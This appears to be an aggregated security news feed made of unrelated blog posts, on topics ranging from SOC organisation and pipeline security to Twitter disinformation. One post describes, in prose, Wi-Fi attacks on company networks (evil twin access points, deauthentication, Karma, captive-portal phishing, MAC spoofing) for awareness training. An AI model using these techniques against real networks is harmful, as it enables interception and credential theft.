Screenshots of DetectionAMP
Indicators of Compromise
Screenshots of DetectionAMP
Apple must be doing something right as the cost of Apple ID data on the Dark Web has dropped, even as the value of Fortnite, Facebook, Netflix and Uber accounts has increased.
Apple is losing value
Last year, I reported that online scammers were spending up to $15 per account on Apple ID information, making Apple customers, “the most appealing targets” for scammers.
The latest edition of Top10VPN’s Dark Web Market Price Index claims scammers are only willing to spend up to $11 for this information today and are targeting arguably less well-secured services instead.
'Drupalgeddon' could be coming to websites running popular content management system, security specialists warn
MongoDB database instance was left unsecured and accessible online without so much as a password to protect it
Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.
Top headlines this week
- U.S. officials charged a former member of the Air Force with defecting in order to help an Iranian cyber espionage unit. The Department of Justice say the woman collected information on former colleagues, and then the Iranian hackers attempted to target those individuals and install spyware on their computers.
- The U.S. Department of Justice is dismantling two task forces aimed at protecting American elections. The groups were originally created after the 2016 presidential election to prevent foreign interference but after the 2018 midterms, the Trump administration shrunk their sizes significantly.
- Facebook and the U.S. government are closing in on a settlement over several privacy violations. Sources familiar with the discussions say it will likely result in a multimillion-dollar fine, likely to be the largest the Federal Trade Commission has ever imposed on a technology company.
- There’s been a recent uptick in the Brushaloader infections. While the malware has been around since mid-2018, this new variant makes it more difficult than ever to detect on infected machines. New features include the ability to evade detection in sandboxes and the avoidance of anti-virus protection.
- Google says it’s stepping up its banning of malicious apps. The company says it’s seen a 66 percent increase in the number of apps its banned from the Google Play store over the past year. Google says it scans more than 50 billion apps a day on users’ phones for malicious activity.
- A new campaign using the Separ malware is attempting to steal login credentials at large businesses. The malware uses short scripts and legitimate executable files to avoid detection.
- A new ATM malware called "WinPot" turns the machines into "slot machines." This allows hackers to essentially gamify ATM hacking, randomizing how much money the machine dispenses.
The rest of the news
- The U.S. is reviving a secret program to carry out supply-chain attacks against Iran. The cyber attacks are targeted at the country’s missile program. Over the past two months, two of Iran’s efforts to launch satellites have failed within minutes, though it’s difficult to assign those failures to the U.S.
- Australia says a “sophisticated state actor” carried out a cyber attack on its parliament. The ruling Liberal-National coalition parties say their systems were compromised in the attack. Since then, the country says it’s put “a number of measures” in place to protect its election system.
- Cisco released security updates for 15 vulnerabilities. Two critical bugs could allow attackers to gain root access to a system, and a third opens the door for a malicious actor to bypass authentication altogether.
- Facebook keeps a list of users that it believes could be a threat to the company or its employees. The database is made up of users who have made threatening posts against the company in the past.
When it comes to vulnerabilities, there is a range of severity and exploitability, which often dictates how quickly a flaw is fixed upon discovery. Most companies prioritize high severity and critical vulnerabilities, but ignore lower severity vulnerabilities. The highest severity flaws are less complicated to attack, offer more opportunity for full application compromise, and are more likely to be remotely exploitable — overall they tend to open up a wider attack blast radius.
In the State of Software Security Volume 9, we analyzed flaw persistence based on where vulnerabilities fall on our five-point severity scale, and we found that organizations hit the three quarters-closed mark about 57% sooner for high and very high severity vulnerabilities than for their less severe counterparts. In fact, our scan data indicates that low severity flaws were attended to at a significantly slower rate than the average speed of closure. It took organizations an average of 604 days to close three quarters of these weaknesses.
Here’s the catch: there could be a low severity vulnerability that is affecting your code and it could be used to exploit your application.
Is the Vulnerability in the Execution Path?
There’s another dimension that often isn’t taken into account when prioritizing fixes, and that’s whether the vulnerability is actually impacting the code. When it comes to open source risk, for example, we know that it is multi-faceted and complex. Simply having a library with vulnerabilities in it does not mean that your app is at risk – you have to first understand if a vulnerable method is being called. When leveraging an open source library, it’s very common for a developer to only use a small subset of that library for a very particular function or capability. This means that it’s highly likely your application never calls on a vulnerability in the library and, in essence, is not exploitable.
Rather than prioritizing fixing a high-severity vulnerability in a function that is not called by your application, it would be more advantageous to prioritize a medium-severity vulnerability that lies in the execution path and puts your customers at risk. When developers have this information, they are empowered to prioritize and immediately fix vulnerabilities that pose the highest likelihood of exploitation. Additionally, their remediation time is reduced by up to 90 percent. The time saved for your developers, and the decreased time the attack window is open, is crucial to protecting your data.
That being said, just because a vulnerability isn’t in the execution path doesn’t necessarily mean your application isn’t exploitable – it may simply mean we were unable to identify an execution path for the vulnerability. It’s still important to fix all of the vulnerabilities in your application, especially the high and very high ones. Vulnerable method information allows your team to know, out of all of the vulnerabilities detected, which ones have the highest likelihood of exploit.
How Veracode’s Software Composition Analysis Can Help
With many tools out there, developers will receive an extremely large list of vulnerabilities for all open source libraries packaged in your application, and they will have to make a judgment call on what to fix first – and how much is worth fixing before pushing to production. Download the Addressing Your Open Source Risk eBook to learn more about how Veracode’s combination of machine learning and natural language can help you efficiently and effectively manage open source risk.
As the use of this technology grows so does the risk that attackers may hijack it
The post ML-era in cybersecurity: A step toward a safer world or the brink of chaos? appeared first on WeLiveSecurity
The size and sophistication of distributed denial-of-service (DDoS) attacks have risen at an ever-accelerating pace. As new 5G networks become operational, we expect the size of attacks will dwarf these records. This is primarily due to the increase in IoT devices that 5G will introduce, with the number set to reach 4.1 billion globally by 2024. Each device is a perfect nest for botnets carrying malware, offering a new DDoS weapon for hackers to take advantage of.
Service providers will need to evolve rapidly with these growing threats and adopt intelligent automation to detect and mitigate security anomalies in a matter of seconds. Sophisticated DDoS threat intelligence, combined with real-time threat detection and automated signature extraction, will allow the marketplace to defend against even the most massive multi-vector DDoS attacks, no matter where they originate.
- Boundary/borderline cases, when decisions about which level is appropriate are arbitrary but the implications can be significant;
- Dynamics - something that is a medium level right now may turn into a high or a low at some future point, perhaps when certain event occurs;
- Context e.g. determining the sensitivity of information for deliberate internal distribution is not the same as for unauthorized access, especially external leakage and legal discovery (think: internal email);
- Dependencies and linkages e.g. an individual data point has more value as part of a time sequence or data set ...
- ... and aggregation e.g. a structured and systematic compilation of public information aggregated from various sources can be sensitive;
- Differing perspectives, biases and prejudices, plus limited knowledge, misunderstandings, plain mistakes and secret agendas of those who classify stuff, almost inevitably bringing an element of subjectivity to the process despite the appearance of objectivity;
- And the implicit "We've classified it and [maybe] done something about securing it ... so we're done here. Next!". It's dismissive.
- Sensitivity, confidentiality or privacy expectations;
- Source e.g. was it generated internally, found on the web, or supplied by a third party?;
- Trustworthiness, credibility and authenticity - could it have been faked?;
- Accuracy and precision which matters for some applications, quite a lot really;
- Criticality for the business, safety, stakeholders, the world ...;
- Timeliness or freshness, age and history, hinting at the information lifecycle;
- Extent of distribution, whether known and authorized or not;
- Utility and value to various parties - not just the current or authorized possessors;
- Probability and impact of various incidents i.e. the information risks;
GandCrab has infected a slew of companies by targeting their MSP’s Third-party vendor hacks, where hackers attack a company by compromising one of their business associates, have been a problem for a while. Now, the hackers behind GandCrab ransomware have gotten into the act, exploiting a year-old SQL injection vulnerability in a common remote IT… Read More
The post GandCrab Ransomware Exploiting an Old Vulnerability to Infect New Victims appeared first on .
Your Wi-Fi routers and access points all have strong WPA2 passwords, unique SSIDs, the latest firmware updates, and even MAC address filtering. Good job, networking and cybersecurity teams! However, is your network truly protected? TL;DR: NO!
In this post, I’ll cover the most common social engineering Wi-Fi association techniques that target your employees and other network users. Some of them are very easy to launch, and if your users aren’t aware of and know how to avoid them, it’s only a matter of time until your network is breached.
Attackers only need a Unix computer (which can be as inexpensive and low-powered as a $30 Raspberry Pi), a Wi-Fi adapter with monitor mode enabled, and a 3G modem for remote control. They can also buy ready-made stations with all of the necessary tools and user interface, but where’s the fun in that?
Figure 1: Wi-Fi hacking tools
1) Evil Twin AP
An effortless and easy technique. All attackers need to do is set up an open AP (Access Point) with the same or similar SSID (name) as the target and wait for someone to connect. Place it far away from the target AP where the signal is low and it’s only a matter of time until some employee connects, especially in big organizations. Alternatively, impatient attackers may follow the next technique.
Figure 2: Evil Twin Demonstration
2. Deauthentication / Disassociation Attack
In the current IEEE 802.11 (Wi-Fi protocol) standards, whenever a wireless station wants to leave the network, it sends a deauthentication or disassociation frame to the AP. These two frames are sent unencrypted and are not authenticated by the AP, which means anyone can spoof those packets.
This technique makes it very easy to sniff the WPA 4-way handshake needed for a Brute Force attack, since a single deauthentication packet is enough to force a client to reconnect.
Even more importantly, attackers can spoof these messages repeatedly and thus disable the communication between Wi-Fi clients and the target AP, which increases the chance your users will connect to the attacker’s twin AP. Combining these 2 techniques works very well, but still depends on the user connecting to the fake AP. The following technique does not, however.
3. Karma Attack
Whenever a user device’s Wi-Fi is turned on but not connected to a network, it openly broadcasts the SSIDs of previously-associated networks in an attempt to connect to one of them. These small packets, called probe requests, are publicly viewable by anyone in the area.
The information gathered from probe requests can be combined with geo-tagged wireless network databases such as Wigle.net to map the physical location of these networks.
If one of the probe requests contains an open Wi-Fi network SSID, then generating the same AP for which the user device is sending probes will cause the user’s laptop, phone or other device to connect to an attacker’s fake AP automatically.
Forcing any connected device to send probe requests is very easy, thanks to the previous technique.
Figure 3: Sniffing Probe Requests
4. Known Beacons
The final attack I’ll discuss that can lead your user to connect to an attacker’s fake AP is “Known Beacons.” This is a random technique where attacker broadcast dozens of beacon frames of common SSIDs that nearby wireless users have likely connected to in the past (like AndroidAP, Linksys, iPhone, etc.). Again, your users will automatically authenticate and connect due to the “Auto-Connect” feature.
An attacker has connected with your user, now what?
Once attackers have access to your user, there’s a variety of stuff they can do: sniff the victim’s traffic, steal login credentials, packet injection, port scan, exploit the user device, etc. But most importantly, the attacker can also get the target AP password by a victim-customized web phishing attack.
Since the victim is using the black hat hacker’s machine as a router, there are many ways to manipulate the phishing page to look convincing. One of them is a captive portal. For example, by DNS hijacking, he can forward all web requests to his local web server, so that his page appears no matter where the victim tries to access it from. Even worse, most operating systems will identify his page as a legitimate captive portal and open it automatically!
Figure 4: Captive Portal Attack
5. Bypassing MAC Address Filtering
As mentioned, your networks may use MAC Filtering, which means only predefined devices can connect to your network and having the password is not enough. How much does that help?
All MAC addresses are hard-coded into a network card and can never be changed. However, attackers can change the MAC address in their operating system and pretend to be one of the allowed devices.
Attackers can easily get the MAC address of one of your network’s allowed devices, since every packet sent to and from your employee’s device includes its MAC address unencrypted. Of course, attackers have to force your employee’s device to disconnect (using deauthentication packets) before connecting to your network using the hacked MAC address.
How Can You Mitigate?
Detecting an Evil AP in your area can be done easily by scanning and comparing configurations of nearby access points. However, as with any social engineering attack, the best way to mitigate is by training your users, which is a critical element of security.
Make sure your network users understand the risk of connecting to open access points and are well aware of the techniques mentioned. Running simulations of the above attacks is also recommended.
Finally, while specific techniques will come and go, social engineering will always remain a popular strategy for attackers. So make sure you and your users remain aware!
The post No One is Safe: the Five Most Popular Social Engineering Attacks Against Your Company’s Wi-Fi Network appeared first on Blog.
Cisco this week identified two “High” security vulnerabilities in its HyperFlex data-center package that could let attackers gain control of the system.
HyperFlex is Cisco’s hyperconverged infrastructure that offers computing, networking and storage resources in a single system.
The more critical of the two warnings – an 8.8 on Cisco’s severity scale of 1-10 – is a command-injection vulnerability in the cluster service manager of Cisco HyperFlex Software that could let an unauthenticated, attacker execute commands as the root user.
The most effective phishing and malware campaigns usually employ one of the following two age-old social engineering techniques:
These online phishing campaigns impersonate a popular brand or product through specially crafted emails, SMS, or social media networks. These campaigns employ various methods including email spoofing, fake or real employee names, and recognized branding to trick users into believing they are from a legitimate source. Impersonation phishing campaigns may also contain a victim’s name, email address, account number, or some other personal detail.
Were frequently asked how we operate our Security Operations Center (SOC) at Microsoft (particularly as organizations are integrating cloud into their enterprise estate). This is the first in a three part blog series designed to share our approach and experience, so you can use what we learned to improve your SOC.
In Part 1: Organization, we start with the critical organizational aspects (organizational purpose, culture, and metrics). In Part 2: People, we cover how we manage our most valuable resourcehuman talent. And finally Part 3: Technology, covers the technology that enables these people to accomplish their mission.
Overall SOC model
Microsoft has multiple security operations teams that each have specialized knowledge to protect the different technical environments at Microsoft. We use a “fusion center” model with a shared operating floor, which we call our Cyber Defense Operations Center (CDOC), to increase collaboration and facilitate rapid communication among these teams. Each team manages to the specific needs of their environment.
In this three part series, we focus on the operation of our corporate IT SOC team as they most closely reflect the challenges and approaches of our customershaving many users and endpoints, email attack vectors, and a hybrid of on-premises and cloud assets. In addition, we include a few lessons learned from the other SOCs and our Detection and Response Team (DART) that helps our customers respond to major incidents.
This SOC operates with three tiers of analysts plus automation as seen in Figure 1 below. (Well provide more details in Part 2: People.)
Figure 1. SOC analyst tiers plus automation.
The tooling in the SOC (Figure 2) is a mixture of centralized breadth capabilities and specialized tools to enable high quality alerts and an end-to-end investigation and remediation experience. (Part 3: Technology will provide more details.)
Figure 2. SOC tooling.
Like all things in security, our SOC has evolved considerably over the years to its current state and will continue to evolve. We recently noticed that our SOC had sustained a 100+ percent growth in incidents handled over the past three years with a nearly flat staffing level. While we dont know if we can expect this astounding trend to continue in the future, it validates that we are on the right track and should share our learnings.
SOC organizational purpose
The first element we cover is the value of the SOC in the context of the overall mission and risk of the organization. Like the traditional incarnations of crime and espionage, we dont expect there will be a straightforward solution to cyberattacks. A SOC is often a crucial risk mitigation investment for an enterprise as it is core to limiting how much time and access attackers have in the organization. This ultimately increases the attackers cost and decreases the benefit, which damages their return on investment (ROI) and motivation for attacking your organization. Everything in the SOC should be oriented toward limiting the time and access attackers can gain to the organizations assets in an attack to mitigate business risk.
At Microsoft, our SOCs bear not just the responsibility of reducing risk to our employees and investors, but also the weight of the trust that millions of customers accessing our cloud services and products put in us.
Weve learned that the SOC has four primary functional integration points with the business:
- Business context (to the SOC)The SOC needs to understand what is most important to the organization so the team can apply that context to fluid real-time security situations. What would have the most negative impact on the business? Downtime of critical systems? A loss of reputation and customer trust? Disclosure of sensitive data? Tampering with critical data or systems? Weve learned its critical that key leaders and staff in the SOC understand this context as they wade through the continuous flood of information and triage incidents and prioritize their time, attention, and effort.
- Joint practice exercises (with the SOC)Business leaders should regularly join the SOC in practicing response to major incidents. This builds the muscle memory and relationships that are critical to fast and effective decision making in the high pressure of real incidents, reducing organizational risk. This practice also reduces risk by exposing gaps and assumptions in the process that can be fixed prior to a real incident.
- Major incidents updates (from the SOC)The SOC should provide updates to business stakeholders for major incidents as they happen. This allows business leaders to understand their risk and take both proactive and reactive steps to manage that risk. For more learnings on major incidents by our DART team, see the incident response reference guide.
- Business intelligence (from the SOC)Sometimes the SOC finds that adversaries are targeting a system or data set that isnt expected. As the SOC discovers the targets of attacks, they should share these with business leaders as these signals may trigger insight for business leaders (outside awareness of a secret business initiative, relative value of an overlooked data set, etc.).
If you take one thing away from this post, its that the SOC culture is just as important as the individuals you hire and the tools you use. Culture guides countless decisions each day by establishing what the right answer looks and feels like in ambiguous situations, which are plentiful in a SOC.
Our cultural elements are very much focused on people, teamwork, and continuous learning and include these learnings:
- Use your human talent wiselyOur people are the most valuable asset we have in the SOC and we cant afford to waste their time on repetitive thoughtless tasks that can be automated. To combat the human threats we face, we need knowledgeable and well-equipped humans that can apply expertise, judgement, and creative thinking. This human factor affects almost every aspect of SOC operations including the role of tools and automation to empower humans to do more (versus replacing them) and in reducing toil on our analysts. (More on this topic in Part 2: People.)
- TeamworkWeve learned that we cant tolerate the lone hero mindset in the SOC, nobody is as smart as all of us together. Teamwork makes a high-pressure working environment like the SOC much more fun, enjoyable, and productive when everyone knows theyre on the same team and everyone has each others back. We design our processes and tools to divide up tasks into specialties and to encourage people to share insights, coordinate and check each others work, and constantly learn from each other.
- Shift left mindsetTo get and stay ahead of cybercriminals and hackers who constantly evolve their techniques, we must continuously improve and shift our activities left in the attack timeline. We focus on speed and efficiency to try and get faster than the speed of attack by looking at ways we could have detected attacks earlier and responded more quickly. This principle is effectively an application of a continuous learning growth mindset that keeps the team laser focused on reducing risk for our organization and our customers.
The final organizational element is how we measure success, a critical element to get right. Metrics translate culture into clear measurable objectives and have a powerful influence on shaping peoples behavior. Weve learned that its critical to consider both what you measure, as well as the way that you focus on and enforce those metrics. We measure several indicators of success in the SOC, but we always recognize that the SOCs job is to manage significant variables that are out of our direct control (attacks, attackers, etc.). We view deviations primarily as a learning opportunity for process or tool improvement rather than a failing on the part of the SOC to meet a goal.
These are the metrics we track, trend, and report on:
- Time to acknowledge (TTA)Responsiveness is one of the few elements the SOC has direct control over. We measure the time between an alert being raised (light starts to blink) and when an analyst acknowledges that alert and begins the investigation. Improving this responsiveness requires that analysts dont waste time investigating false positives while another true positive alert sits waiting. We achieve this with ruthless prioritization. Any alert that requires an analyst response must have a track record of 90 percent true positive. Well talk more about the technology we use in Part 3: Technology and will describe our use of cold path activities like proactive hunting to supplement the hot path of alerts in Part 2: People.
- Time to remediate (TTR)Much like many SOCs, we track the time to remediatean incident to ensure were limiting the time attackers have access to our environment, which drive effectiveness and efficiencies in our SOC processes and tools.
- Incidents remediated (manually/with automation)We measure how many incidents are remediated manually and how many are resolved with automation. This ensures our staffing levels are appropriate and measures the effectiveness of our automation technology.
- Escalations between each tierWe track how many incidents escalated between tiers to ensure we accurately capture the workload for each tier. For example, we need to ensure that Tier 1 work on an escalated incident isnt fully attributed to Tier 2.
Our biggest recommendation for the SOC organization is to define the culture you want to inculcate. This will shape your team and attract the talent you want. In the coming weeks, well share our philosophy on managing people, career paths, skills, and readiness, and what tools we use to enable our people to accomplish their mission. In the meantime, head over to CISO seriesto learn more.
The post Lessons learned from the Microsoft SOC—Part 1: Organization appeared first on Microsoft Secure.
Making a great first impression starts with your domain name
Back Rub, Tokyo Tsushin Kogyo, DrivUrSelf, Research in Motion, Sound of Music.
Wonder if the original names of these big brands would have been as successful if they chose not to go by Google, Sony, Hertz Rent-A-Car, Blackberry or Best Buy?
Unquestionably, the name of your company is the face of your brand. It’s the first thing your audience sees or hears about you, so choosing a business name that catches their attention and evokes credibility is paramount.
And in our competitive world today, what your name is online matters as much as it does off. So, it’s critical to take the time and do your research before choosing your company’s domain name. Consider these following five tips to help you find the winning one:
1. Pick your domain name BEFORE you register your business
Or do it as soon as possible. Whether you’re scribbling ideas on a napkin, in the early stages of development or a year away from launching a website, register your domain name and hold on to it until you’re ready.
2. Be open to all options
Be flexible because you may be surprised at what you’ll find! Evaluate options such as:
· localized (bestbakeryinlondon.com]
· keyword (consumersafeawards.com)
· phrase (keepdreamingup.net]
Just try it. You’ll probably be amazed at what you’ll come up with when your creative juices start flowing!
3. Assess your long-term goals
Avoid settling. Or thinking “once we make it big, I’ll get the domain name I really want.” Take the time now to create a domain name that doesn’t limit you and can scale as your business grows, especially if you’re looking to branch out in the future.
For example, incorporating the state you do business in makes great sense if you want to stay localized, but will this work if you want to expand overseas? Should you promote the main product you’re selling now when you may have additional products or services in the future?
4. Choose your domain extension carefully
What’s to the right of the dot IS as important as what’s to the left. So be mindful of today’s domain extension du jour. Hey, there’s nothing wrong with wanting to be trendy, so why not focus on creating that to the left of the dot? And then anchor it with a TLD that’s tried, tested and trusted, such as a .com or a .net.
5. Use a domain name suggestion tool
To overcome a creative block, try a domain name suggestion service like NameStudio. Quick and easy to use, NameStudio helps you brainstorm with ease, providing unique and relevant domain name suggestions that help you stand out from the crowd and resonate with your target audience.
You can try NameStudio here.
Bottom line: You only have one shot to make a great first impression. And when you’re online, it starts with your domain name. So don’t treat it as an afterthought – spend the necessary time it takes to create a winning domain name that will help build your great brand.
Any company, product and service names and logos referenced herein are property of their respective owners and are for identification purposes only. Use of these names and logos does not imply endorsement.
The post 5 Tips to Choosing Your Winning Business Domain Name appeared first on Verisign Blog.
The First Step to Proactive Threat Defense.
ScoutThreat is a threat intelligence platform (TIP) focused on helping the organization disseminate intelligence by allowing threat modeling between atomic indicators and higher-level objects, assigning risk scores, and prioritizing threats as they pertain to your organization.
By linking atomic indicators such as IP addresses or hashes to higher level objects such as motives or intent of a threat actor, a threat analyst builds the linkage that creates a knowledge management to why your organization is being targeted and provides necessary intelligence when looking to prevent similar attacks in the future.
Its well known by now that pipeline attacks and attacks on utilities of all kinds have been an unfortunately well-trodden path by cyber-adversaries in numerous countries for a few years now. These types of attacks are not theoretical, and the damage done to dateas well as the potential damageis significant.
With this backdrop, it was encouraging to see a few months ago that that the U.S. Government was working in a coordinated fashion to push for a more coordinated effort around pipeline security. As part of the annual Cybersecurity Awareness Month each October, the U.S. Department of Energy (DOE) and Department of Homeland Security (DHS) met with the Oil and Natural Gas Subsector Coordinating Council (ONG SCC) to discuss ongoing threats having to do with pipeline security, resulting in the Pipeline Cybersecurity Initiative.
According to Hunton Andrews Kurth, the Pipeline Cybersecurity Initiative will harness DHSs cybersecurity resources, DOEs energy sector expertise, and the Transportation Security Administrations (TSA) assessment of pipeline security to provide intelligence to natural gas companies and support ONG SCC’s efforts.
And even though the Pipeline Cybersecurity Initiative is in its earliest stages, its worth discussing the key items that it relates to and how it might impact better cybersecurity hygiene going forward across the industry as a whole:
- TimingThe timing for this initiative is important. No longer can industry observers and experts claim that pipeline, energy, and utility security is not an issue. As indicated above, this is a genuine problem that has real-world implications. Moreover, we know that this issue has occurred in a number of different countries.
- Industrial Internet of Things (IIoT)IIoT is a topic that continues to be raised in meetings with customers and partners around the world. Some of those customers are in financial services (think ATMs) while others are in healthcare (think imaging machines) and yet others are of course in energy (think pipelines, pumping stations, etc.). My point is that across unrelated industries, this topic is a very real area that companies are increasingly taking seriously. Utility Dive summarizes this well, With the prevalence of automation and digital sensors, pipelines moving a physical commodity, like oil or natural gas, are vulnerable to cyber-intrusions, just as a transmission line or power plant.
- Public-private partnershipThe public-private nature of this partnership makes good sense and is great to see. For instance, it was important to see this mentioned so openly by the TSA in one of the accompanying statements and is a clear indication that this is a complex issue that requires broader coordination and partnership. The TSA is committed to the mission of securing the nations natural gas and oil pipelines, and values longstanding relationships with pipeline operators across this great nation, said TSA Administrator David Pekoske. This also builds on some of the past few years of efforts in this realm in the U.S. specifically.
- An international issueBeyond the U.S., other countries working on similar initiatives should be mentioned. While not a comprehensive list, it would be remiss not to mention other parts of the world that also either suffer from or worry about this issue, including the U.K., Denmark, and Australia.
To those of us in the cybersecurity world, energy security as it relates to cyberthreats has been a concern for a while. The known attacks have been disconcerting and people beyond the energy industry have recognized this. Practitioners and defenders have been doing fabulous work, and the Pipeline Cybersecurity Initiative will help ensure that additional resources, information-sharing, and coordination will help mitigate additional cyber-related risks against the U.S. energy industry in the coming years. For more information on infrastructure security, read Defending critical infrastructure is imperative and listen to the Cybersecurity Tech Accord web seminar, Cyberattacks on infrastructure.
The post Why the Pipeline Cybersecurity Initiative is a critical step appeared first on Microsoft Secure.
It’s been about 6 months since Def Con 26. Yes, only 6 months. But here we are, it’s 2019, and we are ready for a new round of Def Con prep! The SEVillage is entering its 10th (10th!!) year at Def Con and, we are prepared to make this more amazing than previous years have been. With over 9,000 square feet, we are going to be occupying the third floor of Ballys, in the Las Vegas Ballroom this year at Def Con 27!
However, the SEVillage is nothing without all the people who come and make it such a fun place. And especially those, who sign up to speak and participate in our events. So, with that, we are happy to say that signs ups for the SEVillage are all officially open!
Call For Papers
The SEVillage has been the home of social engineering talks for the past 5 years. The topics have ranged from interrogation techniques, hunting predators SE style, reciprocity, and so much more. We have had tools released and breakthrough research discussed. In these few short years it, has become the place for the human hacking speeches.
Are you interested in signing up to speak in the SEVillage? We have a CFP that is live and waiting for your submission! In the interest of allowing for more to attend the speeches (without it cutting into their evening plans) we, have decided this year to limit all talks to 25 mins. When making your submission, please make sure that your talk has been tailored to that time limit.
Signups will be accepted until: May 1, 2019
The Social Engineering Capture the Flag (SECTF) has been the flagship event for the SEVillage since the beginning of its time. Year after year we, have watched our contestants enter the booth and rock their social engineering skills. This event garners a lot of attention year after year, and is documented by numerous news outlets.
Every year we, have those ask us, “what can I do to get selected to compete in the SECTF?” Our biggest piece of advice is to make sure you submit a video! There are hundreds who submit to compete in the SECTF each year and, the only thing that gives us a glimpse into who you are is your video. So, make it entertaining, make it fun, make it unique and original! Let us see who you are and why you should be in the booth. But remember, follow the rules! Keep in mind we only have 14 slots to fill. If we haven’t picked you to compete in the past, please don’t be discouraged. We encourage you to submit again this year!
IMPORTANT NOTE: In the past we have always held the SECTF on Friday and Saturday during Def Con. Over the years we, have received several concerns over the fact that it is harder to reach companies on Saturday. After some team discussion we, have decided to move the SECTF competition to Thursday and Friday. Please keep this in mind if you are going to submit to compete in the SECTF make sure your travel arrangements allow for you to be present on August 8th and 9th.
Signups accepted until: June 1, 2019.
Videos MUST be submitted by June 15, 2019.
SECTF4Kids and SECTF4Teens
It wouldn’t be the SEVillage at Def Con without the SECTF4Kids and Teens! We’re so excited to be bringing these competitions back. Every year the, young minds at Def Con prove that there is nothing you can put before them that they cannot figure out. We are planning on bringing a fun new theme this year that will challenge the kids and teens! If you are interested in signing your child up, then head on over the sign-up pages!
Signups will be accepted until: June 1, 2019.
See you soon!
We are so excited for our 10th anniversary at Def Con! We have watched the SEVillage grow from a small closet, size room, that only held the SECTF, to a fully functioning village. We hope that all of you can attend and join in on the fun.
Until Vegas, stay safe!
I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks, (like mapping the time of day that @realDonaldTrump tweets) and then moved onto creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.
The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.
Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.
Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.
Here’s what the conversation space looked like between the 14th and 15th of January, 2019.
Notice how the shape of the visualization has changed. Every snapshot produces a different picture, that reflects the opinions, issues, and participants in that particular conversation space, at the moment it was recorded. Here’s one more – this time from the 20th to 21st of January, 2019.
Every interaction space is unique. Here’s a visual representation of interactions between users and hashtags on Twitter during the weekend before the Finnish presidential elections that took place in January of 2018.
And here’s a representation of conversations that happened in the InfoSec community on Twitter between the 15th and 16th of March, 2018.
I’ve been looking at Twitter data on and off for a couple of years now. My focus has been on finding scams, social engineering, disinformation, sentiment amplification, and astroturfing campaigns. Even though the data is readily available via Twitter’s API, and plenty of the analysis can be automated, oftentimes finding suspicious activity just involves blind luck – the search space is so huge that you have to be looking in the right place, at the right time, to find it. One approach is, of course, to think like the adversary. Social networks run on recommendation algorithms that can be probed and reverse engineered. Once an adversary understands how those underlying algorithms work, they’ll game them to their advantage. These tactics share many analogies with search engine optimization methodologies. One approach to countering malicious activities on these platforms is to devise experiments that simulate the way attackers work, and then design appropriate detection methods, or countermeasures against these. Ultimately, it would be beneficial to have automation that can trace suspicious activity back through time, to its source, visualize how the interactions propagated through the network, and provide relevant insights (that can be queried using natural language). Of course, we’re not there yet.
The way social networks present information to users has changed over time. In the past, Twitter feeds contained a simple, sequential list of posts published by the accounts a user followed. Nowadays, Twitter feeds are made up of recommendations generated by the platform’s underlying models – what they understand about a user, and what they think the user wants to see.
A potentially dystopian outcome of social networks was outlined in a blog post written by François Chollet in May 2018, which he describes social media becoming a “psychological panopticon”.
The premise for his theory is that the algorithms that drive social network recommendation systems have access to every user’s perceptions and actions. Algorithms designed to drive user engagement are currently rather simple, but if more complex algorithms (for instance, based on reinforcement learning) were to be used to drive these systems, they may end up creating optimization loops for human behavior, in which the recommender observes the current state of each target (user) and keeps tuning the information that is fed to them, until the algorithm starts observing the opinions and behaviors it wants to see. In essence the system will attempt to optimize its users. Here are some ways these algorithms may attempt to “train” their targets:
- The algorithm may choose to only show its target content that it believes the target will engage or interact with, based on the algorithm’s notion of the target’s identity or personality. Thus, it will cause a reinforcement of certain opinions or views in the target, based on the algorithm’s own logic. (This is partially true today)
- If the target publishes a post containing a viewpoint that the algorithm doesn’t wish the target to hold, it will only share it with users who would view the post negatively. The target will, after being flamed or down-voted enough times, stop sharing such views.
- If the target publishes a post containing a viewpoint the algorithm wants the target to hold, it will only share it with users that would view the post positively. The target will, after some time, likely share more of the same views.
- The algorithm may place a target in an “information bubble” where the target only sees posts from friends that share the target’s views (that are desirable to the algorithm).
- The algorithm may notice that certain content it has shared with a target caused their opinions to shift towards a state (opinion) the algorithm deems more desirable. As such, the algorithm will continue to share similar content with the target, moving the target’s opinion further in that direction. Ultimately, the algorithm may itself be able to generate content to those ends.
Chollet goes on to mention that, although social network recommenders may start to see their users as optimization problems, a bigger threat still arises from external parties gaming those recommenders in malicious ways. The data available about users of a social network can already be used to predict when a when a user is suicidal or when a user will fall in love or break up with their partner, and content delivered by social networks can be used to change users’ moods. We also know that this same data can be used to predict which way a user will vote in an election, and the probability of whether that user will vote or not.
If this optimization problem seems like a thing of the future, bear in mind that, at the beginning of 2019, YouTube made changes to their recommendation algorithms exactly because of problems it was causing for certain members of society. Guillaume Chaslot posted a Twitter thread in February 2019 that described how YouTube’s algorithms favored recommending conspiracy theory videos, guided by the behaviors of a small group of hyper-engaged viewers. Fiction is often more engaging than fact, especially for users who spend all day, every day watching YouTube. As such, the conspiracy videos watched by this group of chronic users received high engagement, and thus were pushed up the recommendation system. Driven by these high engagement numbers, the makers of these videos created more and more content, which was, in-turn, viewed by this same group of users. YouTube’s recommendation system was optimized to pull more and more users into a hole of chronic YouTube addiction. Many of the users sucked into this hole have since become indoctrinated with right-wing extremist views. One such user actually became convinced that his brother was a lizard, and killed him with a sword. Chaslot has since created a tool that allows users to see which of these types of videos are being promoted by YouTube.
Social engineering campaigns run by entities such as the Internet Research Agency, Cambridge Analytica, and the far-right demonstrate that social media advert distribution platforms (such as those on Facebook) have provided a weapon for malicious actors that is incredibly powerful, and damaging to society. The disruption caused by their recent political campaigns has created divides in popular thinking and opinion that may take generations to repair. Now that the effectiveness of these social engineering techniques is apparent, I expect what we’ve seen so far is just an omen of what’s to come.
